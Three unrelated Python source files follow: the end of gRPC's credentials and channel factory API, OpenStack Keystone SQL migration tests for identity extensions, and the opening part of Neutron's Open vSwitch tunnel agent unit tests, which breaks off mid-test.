root_certificates: The PEM-encoded root certificates or unset to ask for
them to be retrieved from a default location.
private_key: The PEM-encoded private key to use or unset if no private key
should be used.
certificate_chain: The PEM-encoded certificate chain to use or unset if no
certificate chain should be used.
Returns:
A ChannelCredentials for use with an SSL-enabled Channel.
"""
if private_key is not None or certificate_chain is not None:
pair = _cygrpc.SslPemKeyCertPair(private_key, certificate_chain)
else:
pair = None
return ChannelCredentials(
_cygrpc.channel_credentials_ssl(root_certificates, pair))
def metadata_call_credentials(metadata_plugin, name=None):
"""Construct CallCredentials from an AuthMetadataPlugin.
Args:
metadata_plugin: An AuthMetadataPlugin to use as the authentication behavior
in the created CallCredentials.
name: A name for the plugin.
Returns:
A CallCredentials.
"""
from grpc import _plugin_wrapping
if name is None:
try:
effective_name = metadata_plugin.__name__
except AttributeError:
effective_name = metadata_plugin.__class__.__name__
else:
effective_name = name
return CallCredentials(
_plugin_wrapping.call_credentials_metadata_plugin(
metadata_plugin, effective_name))
def access_token_call_credentials(access_token):
"""Construct CallCredentials from an access token.
Args:
access_token: A string to place directly in the http request
authorization header, ie "authorization: Bearer <access_token>".
Returns:
A CallCredentials.
"""
from grpc import _auth
return metadata_call_credentials(
_auth.AccessTokenCallCredentials(access_token))
def composite_call_credentials(*call_credentials):
"""Compose multiple CallCredentials to make a new CallCredentials.
Args:
*call_credentials: At least two CallCredentials objects.
Returns:
A CallCredentials object composed of the given CallCredentials objects.
"""
from grpc import _credential_composition
cygrpc_call_credentials = tuple(
single_call_credentials._credentials
for single_call_credentials in call_credentials)
return CallCredentials(
_credential_composition.call(cygrpc_call_credentials))
def composite_channel_credentials(channel_credentials, *call_credentials):
"""Compose a ChannelCredentials and one or more CallCredentials objects.
Args:
channel_credentials: A ChannelCredentials.
*call_credentials: One or more CallCredentials objects.
Returns:
A ChannelCredentials composed of the given ChannelCredentials and
CallCredentials objects.
"""
from grpc import _credential_composition
cygrpc_call_credentials = tuple(
single_call_credentials._credentials
for single_call_credentials in call_credentials)
return ChannelCredentials(
_credential_composition.channel(
channel_credentials._credentials, cygrpc_call_credentials))
def ssl_server_credentials(
private_key_certificate_chain_pairs, root_certificates=None,
require_client_auth=False):
"""Creates a ServerCredentials for use with an SSL-enabled Server.
Args:
private_key_certificate_chain_pairs: A nonempty sequence each element of
which is a pair the first element of which is a PEM-encoded private key
and the second element of which is the corresponding PEM-encoded
certificate chain.
root_certificates: PEM-encoded client root certificates to be used for
verifying authenticated clients. If omitted, require_client_auth must also
be omitted or be False.
require_client_auth: A boolean indicating whether or not to require clients
to be authenticated. May only be True if root_certificates is not None.
Returns:
A ServerCredentials for use with an SSL-enabled Server.
"""
if len(private_key_certificate_chain_pairs) == 0:
raise ValueError(
'At least one private key-certificate chain pair is required!')
elif require_client_auth and root_certificates is None:
raise ValueError(
'Illegal to require client auth without providing root certificates!')
else:
return ServerCredentials(
_cygrpc.server_credentials_ssl(
root_certificates,
[_cygrpc.SslPemKeyCertPair(key, pem)
for key, pem in private_key_certificate_chain_pairs],
require_client_auth))
def channel_ready_future(channel):
"""Creates a Future tracking when a Channel is ready.
Cancelling the returned Future does not tell the given Channel to abandon
attempts it may have been making to connect; cancelling merely deactivates the
returned Future's subscription to the given Channel's connectivity.
Args:
channel: A Channel.
Returns:
A Future that matures when the given Channel has connectivity
ChannelConnectivity.READY.
"""
from grpc import _utilities
return _utilities.channel_ready_future(channel)
def insecure_channel(target, options=None):
"""Creates an insecure Channel to a server.
Args:
target: The target to which to connect.
options: A sequence of string-value pairs according to which to configure
the created channel.
Returns:
A Channel to the target through which RPCs may be conducted.
"""
from grpc import _channel
return _channel.Channel(target, options, None)
def secure_channel(target, credentials, options=None):
"""Creates a secure Channel to a server.
Args:
target: The target to which to connect.
credentials: A ChannelCredentials instance.
options: A sequence of string-value pairs according to which to configure
the created channel.
Returns:
A Channel to the target through which RPCs may be conducted.
"""
from grpc import _channel
return _channel.Channel(target, options, credentials._credentials)
def server(thread_pool, handlers=None):
"""Creates a Server with which RPCs can be serviced.
Args:
thread_pool: A futures.ThreadPoolExecutor to be used by the returned Server
to service RPCs.
handlers: An optional sequence of GenericRpcHandlers to be used to service
RPCs after the returned Server is started. These handlers need not be the
only handlers the server will use to service RPCs; other handlers may
later be added by calling add_generic_rpc_handlers any time before the
returned Server is started.
Returns:
A Server with which RPCs can be serviced.
"""
from grpc import _server
return _server.Server(thread_pool, () if handlers is None else handlers)
################################### __all__ #################################
__all__ = (
'FutureTimeoutError',
'FutureCancelledError',
'Future',
'ChannelConnectivity',
'StatusCode',
'RpcError',
'RpcContext',
'Call',
'ChannelCredentials',
'CallCredentials',
'AuthMetadataContext',
'AuthMetadataPluginCallback',
'AuthMetadataPlugin',
'ServerCredentials',
'UnaryUnaryMultiCallable',
'UnaryStreamMultiCallable',
'StreamUnaryMultiCallable',
'StreamStreamMultiCallable',
'Channel',
'ServicerContext',
'RpcMethodHandler',
'HandlerCallDetails',
'GenericRpcHandler',
'Server',
'unary_unary_rpc_method_handler',
'unary_stream_rpc_method_handler',
'stream_unary_rpc_method_handler',
'stream_stream_rpc_method_handler',
'method_handlers_generic_handler',
'ssl_channel_credentials',
'metadata_call_credentials',
'access_token_call_credentials',
'composite_call_credentials',
'composite_channel_credentials',
'ssl_server_credentials',
'channel_ready_future',
'insecure_channel',
'secure_channel',
'server',
)
| |
# Copyright 2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
To run these tests against a live database:
1. Modify the file `keystone/tests/unit/config_files/backend_sql.conf` to use
the connection for your live database.
2. Set up a blank, live database.
3. Run the tests using::
tox -e py27 -- keystone.tests.unit.test_sql_migrate_extensions
WARNING::
Your database will be wiped.
Do not do this against a Database with valuable data as
all data will be lost.
"""
import sqlalchemy
import uuid
from oslo_db import exception as db_exception
from oslo_db.sqlalchemy import utils
from keystone.contrib import endpoint_filter
from keystone.contrib import endpoint_policy
from keystone.contrib import example
from keystone.contrib import federation
from keystone.contrib import oauth1
from keystone.contrib import revoke
from keystone.tests.unit import test_sql_upgrade
class SqlUpgradeExampleExtension(test_sql_upgrade.SqlMigrateBase):
def repo_package(self):
return example
def test_upgrade(self):
self.assertTableDoesNotExist('example')
self.upgrade(1, repository=self.repo_path)
self.assertTableColumns('example', ['id', 'type', 'extra'])
class SqlUpgradeOAuth1Extension(test_sql_upgrade.SqlMigrateBase):
def repo_package(self):
return oauth1
def upgrade(self, version):
super(SqlUpgradeOAuth1Extension, self).upgrade(
version, repository=self.repo_path)
def _assert_v1_3_tables(self):
self.assertTableColumns('consumer',
['id',
'description',
'secret',
'extra'])
self.assertTableColumns('request_token',
['id',
'request_secret',
'verifier',
'authorizing_user_id',
'requested_project_id',
'requested_roles',
'consumer_id',
'expires_at'])
self.assertTableColumns('access_token',
['id',
'access_secret',
'authorizing_user_id',
'project_id',
'requested_roles',
'consumer_id',
'expires_at'])
def _assert_v4_later_tables(self):
self.assertTableColumns('consumer',
['id',
'description',
'secret',
'extra'])
self.assertTableColumns('request_token',
['id',
'request_secret',
'verifier',
'authorizing_user_id',
'requested_project_id',
'role_ids',
'consumer_id',
'expires_at'])
self.assertTableColumns('access_token',
['id',
'access_secret',
'authorizing_user_id',
'project_id',
'role_ids',
'consumer_id',
'expires_at'])
def test_upgrade(self):
self.assertTableDoesNotExist('consumer')
self.assertTableDoesNotExist('request_token')
self.assertTableDoesNotExist('access_token')
self.upgrade(1)
self._assert_v1_3_tables()
# NOTE(blk-u): Migrations 2-3 don't modify the tables in a way that we
# can easily test for.
self.upgrade(4)
self._assert_v4_later_tables()
self.upgrade(5)
self._assert_v4_later_tables()
class EndpointFilterExtension(test_sql_upgrade.SqlMigrateBase):
def repo_package(self):
return endpoint_filter
def upgrade(self, version):
super(EndpointFilterExtension, self).upgrade(
version, repository=self.repo_path)
def _assert_v1_tables(self):
self.assertTableColumns('project_endpoint',
['endpoint_id', 'project_id'])
self.assertTableDoesNotExist('endpoint_group')
self.assertTableDoesNotExist('project_endpoint_group')
def _assert_v2_tables(self):
self.assertTableColumns('project_endpoint',
['endpoint_id', 'project_id'])
self.assertTableColumns('endpoint_group',
['id', 'name', 'description', 'filters'])
self.assertTableColumns('project_endpoint_group',
['endpoint_group_id', 'project_id'])
def test_upgrade(self):
self.assertTableDoesNotExist('project_endpoint')
self.upgrade(1)
self._assert_v1_tables()
self.assertTableColumns('project_endpoint',
['endpoint_id', 'project_id'])
self.upgrade(2)
self._assert_v2_tables()
class EndpointPolicyExtension(test_sql_upgrade.SqlMigrateBase):
def repo_package(self):
return endpoint_policy
def test_upgrade(self):
self.assertTableDoesNotExist('policy_association')
self.upgrade(1, repository=self.repo_path)
self.assertTableColumns('policy_association',
['id', 'policy_id', 'endpoint_id',
'service_id', 'region_id'])
class FederationExtension(test_sql_upgrade.SqlMigrateBase):
"""Test class for ensuring the Federation SQL."""
def setUp(self):
super(FederationExtension, self).setUp()
self.identity_provider = 'identity_provider'
self.federation_protocol = 'federation_protocol'
self.service_provider = 'service_provider'
self.mapping = 'mapping'
def repo_package(self):
return federation
def insert_dict(self, session, table_name, d):
"""Naively inserts key-value pairs into a table, given a dictionary."""
table = sqlalchemy.Table(table_name, self.metadata, autoload=True)
insert = table.insert().values(**d)
session.execute(insert)
session.commit()
def test_upgrade(self):
self.assertTableDoesNotExist(self.identity_provider)
self.assertTableDoesNotExist(self.federation_protocol)
self.assertTableDoesNotExist(self.mapping)
self.upgrade(1, repository=self.repo_path)
self.assertTableColumns(self.identity_provider,
['id',
'enabled',
'description'])
self.assertTableColumns(self.federation_protocol,
['id',
'idp_id',
'mapping_id'])
self.upgrade(2, repository=self.repo_path)
self.assertTableColumns(self.mapping,
['id', 'rules'])
federation_protocol = utils.get_table(
self.engine,
'federation_protocol')
with self.engine.begin() as conn:
conn.execute(federation_protocol.insert(), id=0, idp_id=1)
self.upgrade(3, repository=self.repo_path)
federation_protocol = utils.get_table(
self.engine,
'federation_protocol')
self.assertFalse(federation_protocol.c.mapping_id.nullable)
def test_service_provider_attributes_cannot_be_null(self):
self.upgrade(6, repository=self.repo_path)
self.assertTableColumns(self.service_provider,
['id', 'description', 'enabled', 'auth_url',
'sp_url'])
session = self.Session()
sp1 = {'id': uuid.uuid4().hex,
'auth_url': None,
'sp_url': uuid.uuid4().hex,
'description': uuid.uuid4().hex,
'enabled': True}
sp2 = {'id': uuid.uuid4().hex,
'auth_url': uuid.uuid4().hex,
'sp_url': None,
'description': uuid.uuid4().hex,
'enabled': True}
sp3 = {'id': uuid.uuid4().hex,
'auth_url': None,
'sp_url': None,
'description': uuid.uuid4().hex,
'enabled': True}
# Insert with 'auth_url' or 'sp_url' set to null must fail
self.assertRaises(db_exception.DBError,
self.insert_dict,
session,
self.service_provider,
sp1)
self.assertRaises(db_exception.DBError,
self.insert_dict,
session,
self.service_provider,
sp2)
self.assertRaises(db_exception.DBError,
self.insert_dict,
session,
self.service_provider,
sp3)
session.close()
def test_fixup_service_provider_attributes(self):
session = self.Session()
sp1 = {'id': uuid.uuid4().hex,
'auth_url': None,
'sp_url': uuid.uuid4().hex,
'description': uuid.uuid4().hex,
'enabled': True}
sp2 = {'id': uuid.uuid4().hex,
'auth_url': uuid.uuid4().hex,
'sp_url': None,
'description': uuid.uuid4().hex,
'enabled': True}
sp3 = {'id': uuid.uuid4().hex,
'auth_url': None,
'sp_url': None,
'description': uuid.uuid4().hex,
'enabled': True}
self.upgrade(5, repository=self.repo_path)
self.assertTableColumns(self.service_provider,
['id', 'description', 'enabled', 'auth_url',
'sp_url'])
# Before the migration, the table should accept null values
self.insert_dict(session, self.service_provider, sp1)
self.insert_dict(session, self.service_provider, sp2)
self.insert_dict(session, self.service_provider, sp3)
# Check if null values are updated to empty string when migrating
session.close()
self.upgrade(6, repository=self.repo_path)
sp_table = sqlalchemy.Table(self.service_provider,
self.metadata,
autoload=True)
session = self.Session()
self.metadata.clear()
sp = session.query(sp_table).filter(sp_table.c.id == sp1['id'])[0]
self.assertEqual('', sp.auth_url)
sp = session.query(sp_table).filter(sp_table.c.id == sp2['id'])[0]
self.assertEqual('', sp.sp_url)
sp = session.query(sp_table).filter(sp_table.c.id == sp3['id'])[0]
self.assertEqual('', sp.auth_url)
self.assertEqual('', sp.sp_url)
def test_add_relay_state_column(self):
self.upgrade(8, repository=self.repo_path)
self.assertTableColumns(self.service_provider,
['id', 'description', 'enabled', 'auth_url',
'relay_state_prefix', 'sp_url'])
class RevokeExtension(test_sql_upgrade.SqlMigrateBase):
_REVOKE_COLUMN_NAMES = ['id', 'domain_id', 'project_id', 'user_id',
'role_id', 'trust_id', 'consumer_id',
'access_token_id', 'issued_before', 'expires_at',
'revoked_at']
def repo_package(self):
return revoke
def test_upgrade(self):
self.assertTableDoesNotExist('revocation_event')
self.upgrade(1, repository=self.repo_path)
self.assertTableColumns('revocation_event',
self._REVOKE_COLUMN_NAMES)
| |
# Copyright 2012 VMware, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
import time
import mock
from oslo_config import cfg
from oslo_log import log
from neutron.agent.common import ovs_lib
from neutron.agent.linux import ip_lib
from neutron.plugins.common import constants as p_const
from neutron.plugins.ml2.drivers.openvswitch.agent.common import constants
from neutron.tests.unit.plugins.ml2.drivers.openvswitch.agent \
import ovs_test_base
# Useful global dummy variables.
NET_UUID = '3faeebfe-5d37-11e1-a64b-000c29d5f0a7'
LS_ID = 420
LV_ID = 42
LV_IDS = [42, 43]
VIF_ID = '404deaec-5d37-11e1-a64b-000c29d5f0a8'
VIF_MAC = '3c:09:24:1e:78:23'
OFPORT_NUM = 1
VIF_PORT = ovs_lib.VifPort('port', OFPORT_NUM,
VIF_ID, VIF_MAC, 'switch')
VIF_PORTS = {VIF_ID: VIF_PORT}
FIXED_IPS = [{'subnet_id': 'my-subnet-uuid',
'ip_address': '1.1.1.1'}]
VM_DEVICE_OWNER = "compute:None"
TUN_OFPORTS = {p_const.TYPE_GRE: {'ip1': '11', 'ip2': '12'}}
BCAST_MAC = "01:00:00:00:00:00/01:00:00:00:00:00"
UCAST_MAC = "00:00:00:00:00:00/01:00:00:00:00:00"
class DummyPort(object):
def __init__(self, interface_id):
self.interface_id = interface_id
class DummyVlanBinding(object):
def __init__(self, network_id, vlan_id):
self.network_id = network_id
self.vlan_id = vlan_id
class TunnelTest(object):
USE_VETH_INTERCONNECTION = False
VETH_MTU = None
def setUp(self):
super(TunnelTest, self).setUp()
cfg.CONF.set_default('firewall_driver',
'neutron.agent.firewall.NoopFirewallDriver',
group='SECURITYGROUP')
cfg.CONF.set_override('report_interval', 0, 'AGENT')
self.INT_BRIDGE = 'integration_bridge'
self.TUN_BRIDGE = 'tunnel_bridge'
self.MAP_TUN_BRIDGE = 'tun_br_map'
self.NET_MAPPING = {'net1': self.MAP_TUN_BRIDGE}
self.INT_OFPORT = 11111
self.TUN_OFPORT = 22222
self.MAP_TUN_INT_OFPORT = 33333
self.MAP_TUN_PHY_OFPORT = 44444
self.LVM = self.mod_agent.LocalVLANMapping(
LV_ID, 'gre', None, LS_ID, VIF_PORTS)
self.LVM_FLAT = self.mod_agent.LocalVLANMapping(
LV_ID, 'flat', 'net1', LS_ID, VIF_PORTS)
self.LVM_VLAN = self.mod_agent.LocalVLANMapping(
LV_ID, 'vlan', 'net1', LS_ID, VIF_PORTS)
self.inta = mock.Mock()
self.intb = mock.Mock()
self.ovs_bridges = {
self.INT_BRIDGE: mock.create_autospec(
self.br_int_cls('br-int')),
self.TUN_BRIDGE: mock.create_autospec(
self.br_tun_cls('br-tun')),
self.MAP_TUN_BRIDGE: mock.create_autospec(
self.br_phys_cls('br-phys')),
}
self.ovs_int_ofports = {
'patch-tun': self.TUN_OFPORT,
'int-%s' % self.MAP_TUN_BRIDGE: self.MAP_TUN_INT_OFPORT
}
def lookup_br(br_name, *args, **kwargs):
return self.ovs_bridges[br_name]
self.mock_int_bridge_cls = mock.patch(self._BR_INT_CLASS,
autospec=True).start()
self.mock_int_bridge_cls.side_effect = lookup_br
self.mock_phys_bridge_cls = mock.patch(self._BR_PHYS_CLASS,
autospec=True).start()
self.mock_phys_bridge_cls.side_effect = lookup_br
self.mock_tun_bridge_cls = mock.patch(self._BR_TUN_CLASS,
autospec=True).start()
self.mock_tun_bridge_cls.side_effect = lookup_br
self.mock_int_bridge = self.ovs_bridges[self.INT_BRIDGE]
self.mock_int_bridge.add_port.return_value = self.MAP_TUN_INT_OFPORT
self.mock_int_bridge.add_patch_port.side_effect = (
lambda tap, peer: self.ovs_int_ofports[tap])
self.mock_int_bridge.get_vif_ports.return_value = []
self.mock_int_bridge.db_list.return_value = []
self.mock_int_bridge.db_get_val.return_value = {}
self.mock_map_tun_bridge = self.ovs_bridges[self.MAP_TUN_BRIDGE]
self.mock_map_tun_bridge.br_name = self.MAP_TUN_BRIDGE
self.mock_map_tun_bridge.add_port.return_value = (
self.MAP_TUN_PHY_OFPORT)
self.mock_map_tun_bridge.add_patch_port.return_value = (
self.MAP_TUN_PHY_OFPORT)
self.mock_tun_bridge = self.ovs_bridges[self.TUN_BRIDGE]
self.mock_tun_bridge.add_port.return_value = self.INT_OFPORT
self.mock_tun_bridge.add_patch_port.return_value = self.INT_OFPORT
self.device_exists = mock.patch.object(ip_lib, 'device_exists').start()
self.device_exists.return_value = True
self.ipdevice = mock.patch.object(ip_lib, 'IPDevice').start()
self.ipwrapper = mock.patch.object(ip_lib, 'IPWrapper').start()
add_veth = self.ipwrapper.return_value.add_veth
add_veth.return_value = [self.inta, self.intb]
self.get_bridges = mock.patch.object(ovs_lib.BaseOVS,
'get_bridges').start()
self.get_bridges.return_value = [self.INT_BRIDGE,
self.TUN_BRIDGE,
self.MAP_TUN_BRIDGE]
self.execute = mock.patch('neutron.agent.common.utils.execute').start()
self._define_expected_calls()
def _define_expected_calls(self, arp_responder=False):
self.mock_int_bridge_cls_expected = [
mock.call(self.INT_BRIDGE),
]
self.mock_phys_bridge_cls_expected = [
mock.call(self.MAP_TUN_BRIDGE),
]
self.mock_tun_bridge_cls_expected = [
mock.call(self.TUN_BRIDGE),
]
self.mock_int_bridge = self.ovs_bridges[self.INT_BRIDGE]
self.mock_int_bridge_expected = [
mock.call.create(),
mock.call.set_secure_mode(),
mock.call.setup_controllers(mock.ANY),
mock.call.delete_port('patch-tun'),
mock.call.setup_default_table(),
]
self.mock_map_tun_bridge_expected = [
mock.call.setup_controllers(mock.ANY),
mock.call.setup_default_table(),
mock.call.delete_port('phy-%s' % self.MAP_TUN_BRIDGE),
mock.call.add_patch_port('phy-%s' % self.MAP_TUN_BRIDGE,
constants.NONEXISTENT_PEER), ]
self.mock_int_bridge_expected += [
mock.call.delete_port('int-%s' % self.MAP_TUN_BRIDGE),
mock.call.add_patch_port('int-%s' % self.MAP_TUN_BRIDGE,
constants.NONEXISTENT_PEER),
]
self.mock_int_bridge_expected += [
mock.call.drop_port(in_port=self.MAP_TUN_INT_OFPORT),
mock.call.set_db_attribute(
'Interface', 'int-%s' % self.MAP_TUN_BRIDGE,
'options:peer', 'phy-%s' % self.MAP_TUN_BRIDGE),
]
self.mock_map_tun_bridge_expected += [
mock.call.drop_port(in_port=self.MAP_TUN_PHY_OFPORT),
mock.call.set_db_attribute(
'Interface', 'phy-%s' % self.MAP_TUN_BRIDGE,
'options:peer', 'int-%s' % self.MAP_TUN_BRIDGE),
]
self.mock_tun_bridge_expected = [
mock.call.reset_bridge(secure_mode=True),
mock.call.setup_controllers(mock.ANY),
mock.call.add_patch_port('patch-int', 'patch-tun'),
]
self.mock_int_bridge_expected += [
mock.call.add_patch_port('patch-tun', 'patch-int'),
]
self.mock_int_bridge_expected += [
mock.call.get_vif_ports(),
mock.call.db_list('Port', columns=['name', 'other_config', 'tag'])
]
self.mock_tun_bridge_expected += [
mock.call.delete_flows(),
mock.call.setup_default_table(self.INT_OFPORT, arp_responder),
]
self.device_exists_expected = []
self.ipdevice_expected = []
self.ipwrapper_expected = [mock.call()]
self.get_bridges_expected = [mock.call(), mock.call()]
self.inta_expected = []
self.intb_expected = []
self.execute_expected = []
def _build_agent(self, **kwargs):
bridge_classes = {
'br_int': self.mock_int_bridge_cls,
'br_phys': self.mock_phys_bridge_cls,
'br_tun': self.mock_tun_bridge_cls,
}
kwargs.setdefault('bridge_classes', bridge_classes)
kwargs.setdefault('integ_br', self.INT_BRIDGE)
kwargs.setdefault('tun_br', self.TUN_BRIDGE)
kwargs.setdefault('local_ip', '10.0.0.1')
kwargs.setdefault('bridge_mappings', self.NET_MAPPING)
kwargs.setdefault('polling_interval', 2)
kwargs.setdefault('tunnel_types', ['gre'])
kwargs.setdefault('veth_mtu', self.VETH_MTU)
kwargs.setdefault('use_veth_interconnection',
self.USE_VETH_INTERCONNECTION)
return self.mod_agent.OVSNeutronAgent(**kwargs)
def _verify_mock_call(self, mock_obj, expected):
mock_obj.assert_has_calls(expected)
self.assertEqual(expected, mock_obj.mock_calls)
def _verify_mock_calls(self):
self._verify_mock_call(self.mock_int_bridge_cls,
self.mock_int_bridge_cls_expected)
self._verify_mock_call(self.mock_tun_bridge_cls,
self.mock_tun_bridge_cls_expected)
self._verify_mock_call(self.mock_phys_bridge_cls,
self.mock_phys_bridge_cls_expected)
self._verify_mock_call(self.mock_int_bridge,
self.mock_int_bridge_expected)
self._verify_mock_call(self.mock_map_tun_bridge,
self.mock_map_tun_bridge_expected)
self._verify_mock_call(self.mock_tun_bridge,
self.mock_tun_bridge_expected)
self._verify_mock_call(self.device_exists, self.device_exists_expected)
self._verify_mock_call(self.ipdevice, self.ipdevice_expected)
self._verify_mock_call(self.ipwrapper, self.ipwrapper_expected)
self._verify_mock_call(self.get_bridges, self.get_bridges_expected)
self._verify_mock_call(self.inta, self.inta_expected)
self._verify_mock_call(self.intb, self.intb_expected)
self._verify_mock_call(self.execute, self.execute_expected)
def test_construct(self):
agent = self._build_agent()
self.assertEqual(agent.agent_id, 'ovs-agent-%s' % cfg.CONF.host)
self._verify_mock_calls()
# TODO(ethuleau): Initially, local ARP responder is be dependent to the
# ML2 l2 population mechanism driver.
# The next two tests use l2_pop flag to test ARP responder
def test_construct_with_arp_responder(self):
self._build_agent(l2_population=True, arp_responder=True)
self._define_expected_calls(True)
self._verify_mock_calls()
def test_construct_without_arp_responder(self):
self._build_agent(l2_population=False, arp_responder=True)
self._verify_mock_calls()
def test_construct_vxlan(self):
self._build_agent(tunnel_types=['vxlan'])
self._verify_mock_calls()
def test_provision_local_vlan(self):
ofports = TUN_OFPORTS[p_const.TYPE_GRE].values()
self.mock_tun_bridge_expected += [
mock.call.install_flood_to_tun(LV_ID, LS_ID, ofports),
mock.call.provision_local_vlan(
network_type=p_const.TYPE_GRE,
lvid=LV_ID,
segmentation_id=LS_ID),
]
a = self._build_agent()
a.available_local_vlans = set([LV_ID])
a.tun_br_ofports = TUN_OFPORTS
a.provision_local_vlan(NET_UUID, p_const.TYPE_GRE, None, LS_ID)
self._verify_mock_calls()
def test_provision_local_vlan_flat(self):
self.mock_map_tun_bridge_expected.append(
mock.call.provision_local_vlan(
port=self.MAP_TUN_PHY_OFPORT,
lvid=LV_ID,
segmentation_id=None,
distributed=False))
self.mock_int_bridge_expected.append(
mock.call.provision_local_vlan(
port=self.INT_OFPORT,
lvid=LV_ID,
segmentation_id=None))
a = self._build_agent()
a.available_local_vlans = set([LV_ID])
a.phys_brs['net1'] = self.mock_map_tun_bridge
a.phys_ofports['net1'] = self.MAP_TUN_PHY_OFPORT
a.int_ofports['net1'] = self.INT_OFPORT
a.provision_local_vlan(NET_UUID, p_const.TYPE_FLAT, 'net1', LS_ID)
self._verify_mock_calls()
def test_provision_local_vlan_flat_fail(self):
a = self._build_agent()
a.provision_local_vlan(NET_UUID, p_const.TYPE_FLAT, 'net2', LS_ID)
self._verify_mock_calls()
def test_provision_local_vlan_vlan(self):
self.mock_map_tun_bridge_expected.append(
mock.call.provision_local_vlan(
port=self.MAP_TUN_PHY_OFPORT,
lvid=LV_ID,
segmentation_id=LS_ID,
distributed=False))
self.mock_int_bridge_expected.append(
mock.call.provision_local_vlan(
port=self.INT_OFPORT,
lvid=LV_ID,
segmentation_id=LS_ID))
a = self._build_agent()
a.available_local_vlans = set([LV_ID])
a.phys_brs['net1'] = self.mock_map_tun_bridge
a.phys_ofports['net1'] = self.MAP_TUN_PHY_OFPORT
a.int_ofports['net1'] = self.INT_OFPORT
a.provision_local_vlan(NET_UUID, p_const.TYPE_VLAN, 'net1', LS_ID)
self._verify_mock_calls()
def test_provision_local_vlan_vlan_fail(self):
a = self._build_agent()
a.provision_local_vlan(NET_UUID, p_const.TYPE_VLAN, 'net2', LS_ID)
self._verify_mock_calls()
def test_reclaim_local_vlan(self):
self.mock_tun_bridge_expected += [
mock.call.reclaim_local_vlan(network_type='gre',
segmentation_id=LS_ID),
mock.call.delete_flood_to_tun(LV_ID),
mock.call.delete_unicast_to_tun(LV_ID, None),
mock.call.delete_arp_responder(LV_ID, None),
]
a = self._build_agent()
a.available_local_vlans = set()
a.local_vlan_map[NET_UUID] = self.LVM
a.reclaim_local_vlan(NET_UUID)
self.assertIn(self.LVM.vlan, a.available_local_vlans)
self._verify_mock_calls()
def test_reclaim_local_vlan_flat(self):
self.mock_map_tun_bridge_expected.append(
mock.call.reclaim_local_vlan(
port=self.MAP_TUN_PHY_OFPORT,
lvid=self.LVM_FLAT.vlan))
self.mock_int_bridge_expected.append(
mock.call.reclaim_local_vlan(
port=self.INT_OFPORT,
segmentation_id=None))
a = self._build_agent()
a.phys_brs['net1'] = self.mock_map_tun_bridge
a.phys_ofports['net1'] = self.MAP_TUN_PHY_OFPORT
a.int_ofports['net1'] = self.INT_OFPORT
a.available_local_vlans = set()
a.local_vlan_map[NET_UUID] = self.LVM_FLAT
a.reclaim_local_vlan(NET_UUID)
self.assertIn(self.LVM_FLAT.vlan, a.available_local_vlans)
self._verify_mock_calls()
def test_reclaim_local_vlan_vlan(self):
self.mock_map_tun_bridge_expected.append(
mock.call.reclaim_local_vlan(
port=self.MAP_TUN_PHY_OFPORT,
lvid=self.LVM_VLAN.vlan))
self.mock_int_bridge_expected.append(
mock.call.reclaim_local_vlan(
port=self.INT_OFPORT,
segmentation_id=LS_ID))
a = self._build_agent()
a.phys_brs['net1'] = self.mock_map_tun_bridge
a.phys_ofports['net1'] = self.MAP_TUN_PHY_OFPORT
a.int_ofports['net1'] = self.INT_OFPORT
a.available_local_vlans = set()
a.local_vlan_map[NET_UUID] = self.LVM_VLAN
a.reclaim_local_vlan(NET_UUID)
self.assertIn(self.LVM_VLAN.vlan, a.available_local_vlans)
self._verify_mock_calls()
def test_port_bound(self):
vlan_mapping = {'segmentation_id': LS_ID,
'physical_network': None,
'net_uuid': NET_UUID,
'network_type': 'gre'}
self.mock_int_bridge_expected += [
mock.call.db_get_val('Port', 'port', 'other_config'),
mock.call.set_db_attribute('Port', VIF_PORT.port_name,
'other_config',
vlan_mapping)]
a = self._build_agent()
a.local_vlan_map[NET_UUID] = self.LVM
a.local_dvr_map = {}
self.ovs_bridges[self.INT_BRIDGE].db_get_val.return_value = {}
a.port_bound(VIF_PORT, NET_UUID, 'gre', None, LS_ID,
FIXED_IPS, VM_DEVICE_OWNER, False)
self._verify_mock_calls()
def test_port_unbound(self):
with mock.patch.object(self.mod_agent.OVSNeutronAgent,
'reclaim_local_vlan') as reclaim_local_vlan:
a = self._build_agent()
a.local_vlan_map[NET_UUID] = self.LVM
a.port_unbound(VIF_ID, NET_UUID)
reclaim_local_vlan.assert_called_once_with(NET_UUID)
self._verify_mock_calls()
def test_port_dead(self):
self.mock_int_bridge_expected += [
mock.call.db_get_val('Port', VIF_PORT.port_name, 'tag',
log_errors=True),
mock.call.set_db_attribute(
'Port', VIF_PORT.port_name,
'tag', self.mod_agent.DEAD_VLAN_TAG,
log_errors=True),
mock.call.drop_port(in_port=VIF_PORT.ofport),
]
a = self._build_agent()
a.available_local_vlans = set([LV_ID])
a.local_vlan_map[NET_UUID] = self.LVM
self.ovs_bridges[self.INT_BRIDGE].db_get_val.return_value = mock.Mock()
a.port_dead(VIF_PORT)
self._verify_mock_calls()
def test_tunnel_update(self):
tunnel_port = '9999'
self.mock_tun_bridge.add_tunnel_port.return_value = tunnel_port
self.mock_tun_bridge_expected += [
mock.call.add_tunnel_port('gre-0a000a01', '10.0.10.1', '10.0.0.1',
'gre', 4789, True),
mock.call.setup_tunnel_port('gre', tunnel_port),
]
a = self._build_agent()
a.tunnel_update(
mock.sentinel.ctx, tunnel_ip='10.0.10.1',
tunnel_type=p_const.TYPE_GRE)
self._verify_mock_calls()
def test_tunnel_update_self(self):
a = self._build_agent()
a.tunnel_update(
mock.sentinel.ctx, tunnel_ip='10.0.0.1')
self._verify_mock_calls()
def test_daemon_loop(self):
reply2 = {'current': set(['tap0']),
'added': set(['tap2']),
'removed': set([])}
reply3 = {'current': set(['tap2']),
'added': set([]),
'removed': set(['tap0'])}
self.mock_int_bridge_expected += [
mock.call.check_canary_table(),
mock.call.check_canary_table()
]
